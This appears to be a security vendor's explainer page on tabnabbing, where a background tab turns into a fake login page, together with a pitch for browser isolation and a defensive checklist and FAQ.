Category: Deception & Impersonation
Tabnabbing in the browser
Tabnabbing is a trick where a background tab changes into a fake login page, hoping the user returns later and enters credentials.
Quick answer
It exploits normal tabbed browsing habits: users often keep many tabs open and don’t re-validate the context when they come back.
For risky links and login flows, isolation keeps the page off the endpoint by running it in a disposable container and streaming only the rendered output to the user.
When you need this
- You’ve seen indicators of this threat in your environment.
- Users frequently click unknown links as part of daily work.
- You need a control that reduces risk without relying on perfect user judgment.
Last updated
2026-01-29
How it usually happens in the browser
- A user opens a tab that initially looks legitimate (or innocuous).
- While the tab is in the background, a script changes the page content and title to mimic a login screen.
- The favicon/title often mimic a well-known service to make the tab look familiar.
- When the user returns, they assume they were logged out and re-enter credentials.
What traditional defenses miss
- Users aren’t expecting a page to change after they stop interacting with it.
- Network tools may not block the initial page if it is “clean” at load time.
- Training focuses on links and email, not on tab behavior and dynamic page changes.
How isolation changes the game
- Isolation reduces endpoint exposure to dynamic scripts on untrusted sites and makes risky sessions disposable.
- Policy-based isolation can cover “unknown destinations” where tabnabbing payloads commonly live.
- Session deletion limits the persistence of malicious tabs and reduces leftover state from risky browsing.
Operational checklist
- Isolate unknown domains and common ad/redirect sources by default.
- Encourage use of password managers that only autofill on exact domains.
- Limit or block third-party scripts where possible; use stricter content policies for risky browsing.
- Teach users to re-check the domain on unexpected login prompts—even if it’s a “tab they already opened.”
- Prioritize phishing-resistant MFA for critical apps to reduce impact from credential entry.
FAQs
Is tabnabbing still a real threat?
Yes. It’s a lightweight technique that can be embedded in otherwise normal web pages and relies on user habits rather than technical exploits.
How can users protect themselves?
Use a password manager, avoid entering credentials after returning to an old tab, and verify the domain for unexpected login prompts.
Does isolation stop tabnabbing?
It reduces risk by containing untrusted scripts away from the endpoint and making those sessions disposable, but domain controls and strong auth still matter.
Is this the same as session hijacking?
No. Tabnabbing tricks the user into giving up credentials. Session hijacking steals or reuses an existing authenticated session.